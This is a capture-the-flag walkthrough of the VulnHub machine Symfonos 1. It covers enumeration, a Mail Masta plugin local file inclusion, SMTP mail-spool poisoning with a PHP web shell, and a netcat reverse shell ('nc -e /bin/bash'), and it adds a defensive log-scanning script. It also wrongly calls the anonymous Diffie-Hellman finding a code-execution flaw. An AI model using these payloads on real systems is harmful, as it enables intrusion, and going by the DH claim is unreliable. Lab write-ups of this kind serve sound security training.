Symfonos 1 || VulnHub Walkthrough

Hello, everyone! Welcome to a new episode of our VulnHub Walkthrough series. In this video, we’re kicking off a series on the vulnerable machine called "SymfonOS", which includes six different VMs with varying levels of difficulty. Today, we’ll be exploring the first VM, "SymfonOS 1", rated as "Easy".

To begin, head over to the VulnHub website and download the machine's image file. 


If you're new to VulnHub, make sure to check out our playlist for helpful guides on how to use the platform. 


Now, let’s get started with exploiting this machine!


Setting Up

With the image downloaded, the next step is to set it up as a virtual machine in VirtualBox.

The downloaded image file is in the form of 7Z format, so start by extracting the archive to access the files within. You’ll find several files, including the essential VMDK files, in the extracted folder.

Next, create a new virtual machine: in VirtualBox, click "New".

Name it "SymfonOS 1," set the OS type to Linux, and choose "Other Linux 64-bit" for the version since the specific distribution is unknown.

Now, Allocate the desired amount of RAM. 

Next, select " Use an existing virtual hard disk file " and locate the VMDK file and, click on " Finish " to complete the setup. 

Once the setup is finished, you'll see the "SymfonOS 1" vulnerable machine in the VirtualBox manager. For better organization, let me regroup it into the VulnHub group.

The Kali Linux machine (used for attacking) and the vulnerable machine need to be on the same network, so both should use a host-only adapter.

In the VM's settings, change the network adapter to "Host-Only".

With everything in place, start the VM to check that it boots.

Once it's ready you should see a login prompt, which tells us the machine is up and we can begin the exploration. Let's dive into the fun!


Enumeration

Identifying IP address

The first step is enumeration: identify the target's IP address with netdiscover. Open a terminal and run "sudo netdiscover -i <network interface>"; the host-only interface here is "eth1".

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1  

 Currently scanning: 192.168.107.0/16   |   Screen View: Unique Hosts                                                                                    
                                                                                                                                                         
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.103.2   08:00:27:ca:20:8e      2     120  PCS Systemtechnik GmbH                                                                                
 192.168.103.1   0a:00:27:00:00:14      1      60  Unknown vendor                                                                                        
 192.168.103.13  08:00:27:45:fa:02      1      60  PCS Systemtechnik GmbH   

We obtained our target IP address from the scan results: " 192.168.103.13 ".


Conduct a Network Scan

Next, we'll conduct a network scan to identify open ports, a crucial step in the enumeration process. This helps us understand the attack surface and strategize targeted attacks. For this purpose, we'll use the popular Nmap tool.

On the terminal, run "nmap -sC -sV <target IP address>".

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.103.13  

In this command, 

  • " -sC " is used to perform a script scan using the default set of scripts, and 
  • the "-sV" enables version detection allowing us to identify which versions are running on which port.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-22 05:14 EST
Nmap scan report for symfonos.local (192.168.103.13)
Host is up (0.00043s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h59m58s, deviation: 3h27m50s, median: -1s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2024-11-22T04:14:48-06:00
| smb2-time: 
|   date: 2024-11-22T10:14:48
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

After completing the scan, five open TCP ports and their services are revealed:

  • Port 22: OpenSSH 7.4p1 on Debian, giving remote shell access if we obtain valid credentials.
  • Port 25: Postfix SMTP. The banner advertises STARTTLS, a 10 MB message size limit and VRFY, which lets a client ask whether a local mailbox exists.
  • Port 80: Apache httpd 2.4.25 (Debian) serving a page with no title.
  • Ports 139 and 445: Samba 4.5.16 (workgroup WORKGROUP), used for file and printer sharing.

We’ll leverage these open ports to gain initial access to the server. Before proceeding, let’s conduct a deeper enumeration of these ports to uncover potential clues or vulnerabilities that might help us gain a foothold or shell access.


Run Nmap Scripting Engine (NSE) Vulnerability Scripts

Now, let’s use the Nmap Scripting Engine to scan for known vulnerabilities on the detected ports and services. 

┌──(kali㉿kali)-[~]
└─$ nmap --script vuln 192.168.103.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-22 05:20 EST
Nmap scan report for symfonos.local (192.168.103.13)
Host is up (0.00043s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 2048
|             Generator Length: 8
|             Public Key Length: 2048
|     References:
|_      https://www.ietf.org/rfc/rfc2246.txt
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /manual/: Potentially interesting folder
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

Nmap done: 1 IP address (1 host up) scanned in 48.25 seconds
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The scan flags two items, neither of which is as useful as it first looks:

  1. Anonymous Diffie-Hellman Key Exchange MitM Vulnerability: the Postfix STARTTLS configuration still offers anonymous DH cipher suites, so an attacker on the network path could intercept a TLS-protected SMTP session. It is a configuration weakness, not a way to run code on the server.
  2. Service regsvc in Microsoft Windows systems vulnerable to denial of service: this script targets the registry service on Windows 2000 hosts. Our target is Samba on Debian, so the result is a false positive. Note that the script is destructive by design (it crashes the service if it is vulnerable), which is one reason to be careful running the whole vuln category against systems you care about.

Based on these results, we'll examine each exposed service more closely to see whether it leads to shell access, starting with the web service.


Web Enumeration and Directory-busting

The Nmap scan shows port 80 open with an Apache web server:

80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).

To look at the contents ourselves, open a web browser, and navigate to the target’s IP address in the URL bar at the top of the window.

Upon visiting the webpage, we find an image, likely depicting a scene from Greek mythology—possibly the Fall of Phaeton—though it doesn’t provide any useful information for our purposes.

To uncover potential entry points, our next step is directory busting to search for hidden directories or pages that might contain valuable information. For this, we’ll use the gobuster tool. Run the following command:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.103.13/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

where, 

  • gobuster dir  tells gobuster to run in directory enumeration mode. 
  • -u  is used to specify the target URL we want to explore. 
  • -w  is used to provide the path to the wordlist containing common directory names to try.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.103.13/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/manual               (Status: 301) [Size: 317] [--> http://192.168.103.13/manual/]
/server-status        (Status: 403) [Size: 302]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

gobuster only turned up /manual (the stock Apache documentation) and /server-status (forbidden), so there is nothing useful on the default site. We'll shift our focus to the other open ports.


SMB Share Enumeration

The SMB (Samba) service on Ports 139 and 445 is a good candidate for further investigation, as it might contain accessible or misconfigured shares that can provide useful information.

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

Misconfigured shares are sometimes readable without authentication. To check, we'll use smbclient with -L to list the shares and -N to connect without a username or password.

┌──(kali㉿kali)-[~]
└─$ smbclient -L 192.168.103.13 -N

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        helios          Disk      Helios personal share
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The command output shows several shared directories:

  1. print$ : This is typically used for printer drivers and may not contain sensitive data.
  2. helios : A personal share labeled "Helios," likely belonging to a specific user. This may contain personal files or sensitive data.
  3. anonymous : An open share, potentially accessible to anyone without authentication. This could be a misconfiguration and may contain useful information.
  4. IPC$ : An inter-process communication share, generally used for communication between processes and not likely to contain valuable files.

Let’s try to access the shown shared directories. 

┌──(kali㉿kali)-[~]
└─$ smbclient '\\192.168.103.13\print$\' -N
tree connect failed: NT_STATUS_ACCESS_DENIED
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ smbclient '\\192.168.103.13\helios\' -N
tree connect failed: NT_STATUS_ACCESS_DENIED
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

Both print$ and helios reject an anonymous connection with NT_STATUS_ACCESS_DENIED, so we need valid credentials for those.

┌──(kali㉿kali)-[~]
└─$ smbclient '\\192.168.103.13\anonymous\' -N
Try "help" to get a list of possible commands.
smb: \>

The anonymous share, however, does not require credentials and drops us at a prompt. Let's list its files and directories.

smb: \> ls
  .                                   D        0  Fri Jun 28 21:14:49 2019
  ..                                  D        0  Fri Jun 28 21:12:15 2019
  attention.txt                       N      154  Fri Jun 28 21:14:49 2019

                19994224 blocks of size 1024. 17261784 blocks available
smb: \>

The file attention.txt appears significant, so we’ll download it and inspect its contents for any helpful information to potentially gain further access to the system.

smb: \> get attention.txt 
getting file \attention.txt of size 154 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ cat attention.txt 

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$  

The note from Zeus tells us three passwords that have been in use on this system: 'epidioko', 'qwerty' and 'baseball'. That is a ready-made wordlist: combined with a username, these are the first candidates to try against any authenticated service on the box (SMB, SSH, the web application).

Now, let’s try to access the  helios  share. 


Enumerate Helios Share

If we connect to the helios share without -U, smbclient sends our local username, kali, and the passwords from the hint are rejected with Access Denied because no such Samba account exists.

The share name itself suggests the username helios, so we specify it explicitly with -U helios and try the three passwords from attention.txt one at a time. After a few attempts, one of the weak passwords is accepted.

┌──(kali㉿kali)-[~]
└─$ smbclient '\\192.168.103.13\helios\' -U helios
Password for [WORKGROUP\helios]:
Try "help" to get a list of possible commands.
smb: \>

Once logged in, list the files and directories in the helios share to look for personal files or sensitive data.

smb: \> ls
  .                                   D        0  Fri Jun 28 20:32:05 2019
  ..                                  D        0  Fri Jun 28 20:37:04 2019
  research.txt                        A      432  Fri Jun 28 20:32:05 2019
  todo.txt                            A       52  Fri Jun 28 20:32:05 2019

                19994224 blocks of size 1024. 17261784 blocks available
smb: \> 

Two files, research.txt and todo.txt , are present. We’ll retrieve both files for closer examination.

smb: \> get research.txt 
getting file \research.txt of size 432 as research.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> get todo.txt 
getting file \todo.txt of size 52 as todo.txt (12.7 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> 

Once downloaded, we'll examine the contents to determine if they contain critical information, like usernames, passwords, or system-related data that might support our exploitation efforts.

┌──(kali㉿kali)-[~]
└─$ cat research.txt 
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

research.txt is background on Helios, the Greek sun god and subject of the Colossus of Rhodes; it contains no credentials, paths or technical details.

Since research.txt has nothing actionable, let's move on to the second file.

┌──(kali㉿kali)-[~]
└─$ cat todo.txt    

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

todo.txt is a list of personal tasks, but item 3, "Work on /h3l105", looks like a directory on the web server (port 80).

Browsing to http://192.168.103.13/h3l105/ may reveal files, scripts or pages with useful information, or possibly a vulnerable application.

The directory hosts a WordPress site, but it renders broken (no styling), and following a link to the blog content produces a browser error saying it can't find the site symfonos.local.

The cause is that WordPress was configured with symfonos.local as its site URL, so every link and asset it generates points at that hostname instead of the IP address. Two things make that fail for us:

  1. our attacking machine has no DNS record for symfonos.local, so the browser cannot turn the name into an IP address, and
  2. we never typed that hostname ourselves; the site's own pages send us to it.

The fix is a static entry in the local hosts file, /etc/hosts, which the resolver consults before DNS.

Open it with sudo nano /etc/hosts and append one line containing the target's IP address followed by the hostname, i.e. 192.168.103.13 and symfonos.local separated by whitespace. With that entry in place, the browser can reach the site that was previously reporting an error.

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts

Save in nano with CTRL + X, confirm with Y and hit Enter.

With the hostname mapped, reload the target page in the browser. The name now resolves through /etc/hosts and the blog content loads correctly.


Enumerate WordPress Site

WordPress installs are a frequent target: an unmaintained core version, theme or plugin is often enough for a foothold. To find out what this site is running, we'll use WPScan to enumerate the WordPress version, theme and plugins.

WPScan is a security tool that checks for vulnerabilities associated with outdated WordPress versions, plugins, and themes, helping identify if the site is exposed to any known security risks.

If you’re new to using WPScan, I recommend watching this tutorial video and reading my blog post, where I cover WPScan’s functionality and detailed usage. 


These resources will help you understand how to effectively scan WordPress sites for vulnerabilities.

To begin, open your terminal and enter the command: wpscan --url  <URL of the WordPress site> .

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.103.13/h3l105/

This command initiates a scan that will analyze the WordPress site for vulnerabilities , misconfigurations , and other security issues.

Now, let’s examine the highlights of the scan output, which point to where further investigation is worthwhile.

  • The XML-RPC feature is active on this site. XML-RPC can be vulnerable to certain WordPress attacks, such as brute force or denial of service, making it worth noting for further investigation.
  • The scan identifies the site as running WordPress version 5.2.2 , an older version with known vulnerabilities. This information is valuable, as vulnerabilities in outdated WordPress versions can often be exploited if not patched.
  • The active theme, Twenty Nineteen , is also outdated. Older themes can expose sites to theme-specific vulnerabilities, so this could potentially be an entry point if any unpatched issues exist.
  • WPScan detects the presence of two plugins, with particular attention to the Mail Masta plugin (version 1.0). This plugin has been associated with vulnerabilities in the past, making it especially interesting for our investigation.

With the Mail Masta plugin identified, let's search for any documented vulnerabilities specifically affecting version 1.0. If exploitable, these vulnerabilities could provide an initial foothold on the target system.


Foothold

Search Vulnerability

On the terminal run the following command:

┌──(kali㉿kali)-[~]
└─$ searchsploit mail-masta 1.0                   
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                                                  | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)                                                              | php/webapps/50226.py
WordPress Plugin Mail Masta 1.0 - SQL Injection                                                                         | php/webapps/41438.txt
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

Searchsploit returns three entries for Mail Masta 1.0: two for the same Local File Inclusion (a text advisory and a Python proof of concept) and one SQL Injection. The LFI stands out, because it could let us read files on the server by supplying a file path in a URL parameter. That could expose sensitive information such as configuration files or credentials and help us compromise the target further.

Let's save and examine the exploit file 40290.txt to gain further insight into leveraging the LFI vulnerability. 

┌──(kali㉿kali)-[~]
└─$ searchsploit -m php/webapps/40290.txt
  Exploit: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/40290
     Path: /usr/share/exploitdb/exploits/php/webapps/40290.txt
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/40290.txt


                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Once downloaded, we’ll thoroughly review the steps provided in the exploit.

[+] Date: [23-8-2016]
[+] Autor Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion

The File Inclusion vulnerability allows an attacker to include a file, usually by exploiting a "dynamic file inclusion" mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

Source: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

Source: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);


This looks like a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.


Typical proof-of-concept would be to load passwd file:


http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

The 40290.txt advisory documents a Local File Inclusion (LFI) in the Mail Masta plugin. Two plugin scripts, count_of_send.php and csvexport.php, pass the pl GET parameter straight to include() with no validation, so whatever path a client supplies is read by PHP and pulled into the page. Because the scripts live under wp-content/plugins and are requested directly, no WordPress login is needed.

The standard proof is to include /etc/passwd, which is world-readable on Linux and lists the system's user accounts.

Using the provided example URL, we can test for this vulnerability.

http://target-server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Replace target-server with the target's address and WordPress path, giving http://192.168.103.13/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd. If the response contains the contents of /etc/passwd, LFI is confirmed.

It does: the page comes back with /etc/passwd in it, and the account list includes the user helios we already know from SMB. With file reads confirmed, a natural next target is wp-config.php, which holds the database credentials and other application secrets.

Two obstacles stand in the way. We don't yet know the on-disk directory WordPress is installed in, and include() executes PHP files rather than printing them, so pulling wp-config.php in directly would show nothing useful. A more direct route to deeper access is to turn the file read into code execution and get a reverse shell.


Exploiting SMTP service with Log Poisoning

Upon examining open ports, we observe that the SMTP service is active, indicating a potential mail server connection. 

25/tcp  open  smtp        Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8

/etc/passwd confirmed that helios is a real local user. On a Debian system running Postfix, mail addressed to a local user is delivered to a per-user spool file under /var/mail, so a message to helios should end up in /var/mail/helios. That file isn't something we can open from outside, but the LFI already gives us a way to read any file the web server can access.

Put together, SMTP gives us a way to write attacker-chosen text onto the target's disk, and the LFI gives us a way to have the web server interpret that text as PHP.

In our earlier Nmap scan, we identified a finding on the SMTP service: an Anonymous Diffie-Hellman Key Exchange MitM (Man-in-the-Middle) vulnerability.

25/tcp  open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 2048
|             Generator Length: 8
|             Public Key Length: 2048
|     References:
|_      https://www.ietf.org/rfc/rfc2246.txt

This vulnerability allows potential exploitation for Remote Code Execution (RCE), enabling us to inject commands that could lead to compromising the mail server. 

By exploiting this vulnerability, we aim to establish a reverse shell and potentially escalate privileges, gaining full control over the target system.

To exploit this, we send an email through SMTP using a short sequence of commands. Telnet or Netcat lets us talk to the SMTP server directly.

To start the session, connect to the SMTP server on port 25 from the terminal:

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.103.13 25                                                        
Trying 192.168.103.13...
Connected to 192.168.103.13.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)

At this stage, we see the server’s greeting, indicating the SMTP session is established.

Next, use the HELO command followed by a domain name (our own or any made-up one) to introduce ourselves to the server.

HELO example.com
250 symfonos.localdomain

The server responds with 250, confirming that it accepts our introduction.

Now we specify the sender. The MAIL FROM command sets the sender's email address.

MAIL FROM:<[email protected]>
250 2.1.0 Ok

The server’s 250 2.1.0 Ok response confirms the sender’s address.

Now we specify the recipient. The RCPT TO command sets the recipient's address; we have already determined that the target's mail user is helios.

RCPT TO:Helios
250 2.1.5 Ok

Now we compose the message. The DATA command starts message composition.

DATA
354 End data with <CR><LF>.<CR><LF>

This command indicates the start of the email content.

Now, instead of a normal email body, we insert our PHP code:

<?php system($_GET['cmd']); ?>

If this snippet is later included through the LFI, it will run whatever system command we pass in the cmd parameter.

Ending the message with a  single period ( . )  on a line by itself signals to the SMTP server that the message is complete.

.
250 2.0.0 OK: queued as E588740698

Once the message has been queued, it is written to the helios mail spool. We can then include that spool through the LFI in the browser and check whether the payload executes; this tells us whether the log poisoning has given us command injection on the target.

To start, we send basic commands through the cmd parameter to test for Remote Code Execution (RCE):

http://target-server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=<command_here>

Once we verify that commands can be executed, we’ll proceed with a reverse shell for a more interactive connection.
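As an added example, not part of the original post, the following Python shows what this attack chain leaves behind for a defender and how to detect it: access-log entries where the pl parameter carries an absolute path, a traversal or the mail spool (with a cmd parameter alongside), and a delivered mail message whose body contains a PHP open tag. The log lines, the mbox spool and the sender addresses are constructed for the example; the plugin path, the client address and the payload line match the walkthrough.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines (not real server logs). The plugin path and
# the client address are the walkthrough's; timestamps, sizes and the last request are invented.
SAMPLE_ACCESS_LOG = """\
192.168.103.3 - - [22/Nov/2024:13:00:01 +0000] "GET /h3l105/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.103.3 - - [22/Nov/2024:13:00:05 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1420 "-" "Mozilla/5.0"
192.168.103.3 - - [22/Nov/2024:13:00:09 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id HTTP/1.1" 200 980 "-" "Mozilla/5.0"
192.168.103.3 - - [22/Nov/2024:13:00:12 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
192.168.103.3 - - [22/Nov/2024:13:00:20 +0000] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=helper.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INCLUDE_PARAMS = {"pl"}  # the parameter the page identifies; extend for other plugins
SENSITIVE_PREFIXES = ("/etc/", "/var/mail/", "/var/log/", "/proc/self/", "/home/")


def classify_request(target: str):
    """Return sorted indicator names for one request target; empty list means nothing suspicious."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    indicators = set()
    for name in INCLUDE_PARAMS:
        for raw in query.get(name, []):
            value = unquote(raw)  # parse_qs decoded once; decode again to catch double encoding
            if value.startswith("/"):
                indicators.add("absolute-path")
            if ".." in value:
                indicators.add("traversal")
            if value.startswith(SENSITIVE_PREFIXES):
                indicators.add("sensitive-file")
            if "php://" in value.lower() or value.lower().startswith("data:"):
                indicators.add("stream-wrapper")
    # A cmd parameter next to an include indicator is the poisoned-file trigger seen on the page.
    if indicators and "cmd" in query:
        indicators.add("command-parameter")
    return sorted(indicators)


def scan_access_log(text: str):
    """Parse combined-format lines and return (client, target, indicators) for the flagged ones."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        indicators = classify_request(match.group("target"))
        if indicators:
            findings.append((match.group("ip"), match.group("target"), indicators))
    return findings


# Constructed mbox spool standing in for /var/mail/helios: one poisoned message, one normal one.
SAMPLE_SPOOL = """\
From attacker@example.com  Fri Nov 22 13:00:00 2024
Return-Path: <attacker@example.com>
To: helios@symfonos.localdomain

<?php system($_GET['cmd']); ?>

From alice@example.com  Fri Nov 22 13:05:00 2024
To: helios@symfonos.localdomain

Hi, lunch at noon?
"""
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)


def poisoned_messages(spool: str):
    """Return the 'From ' envelope line of every mbox message whose text contains a PHP open tag."""
    hits, current, tagged = [], None, False
    for line in spool.splitlines():
        if line.startswith("From "):          # mbox message separator
            if current is not None and tagged:
                hits.append(current)
            current, tagged = line, False
        elif PHP_TAG_RE.search(line):
            tagged = True
    if current is not None and tagged:
        hits.append(current)
    return hits


if __name__ == "__main__":
    for client, target, indicators in scan_access_log(SAMPLE_ACCESS_LOG):
        print(client, indicators, target)
    print("poisoned:", poisoned_messages(SAMPLE_SPOOL))
```

Both checks are cheap enough to run on a schedule: the log rule catches the read of /etc/passwd and the trigger request even before the spool is poisoned, and the spool scan gives the mail server side an independent signal that does not depend on the web logs.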


Gaining a Reverse Shell

To establish a reverse shell, we’ll craft a payload for the target’s RCE URL that will connect back to our Kali Linux machine. 

nc -e /bin/bash <Listening Host IP> <Listening Port>

For this payload, include the Kali Linux IP address and specify the listening port. On the Kali machine, set up a Netcat listener to receive the connection from the target. 

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234  
listening on [any] 1234 ...

Once the reverse shell payload is executed on the target, a successful connection will grant us shell access to the system. 

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234  
listening on [any] 1234 ...
connect to [192.168.103.3] from (UNKNOWN) [192.168.103.13] 51150

Once the listener is running, a connection arrives from the target's IP address, confirming that the payload has triggered the callback to our Kali machine.

Now, let's confirm the shell is working by running a simple command, such as `id`. 

id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

This reveals the current user and group information, showing that we are running as "helios". However, while the shell is functional, it lacks interactivity. To make it more usable, we check for Python with `which python`, which returns `/usr/bin/python`. We then run `python -c "import pty; pty.spawn('/bin/bash')"` to spawn a pseudo-terminal, which gives us a much more usable shell.

which python
/usr/bin/python
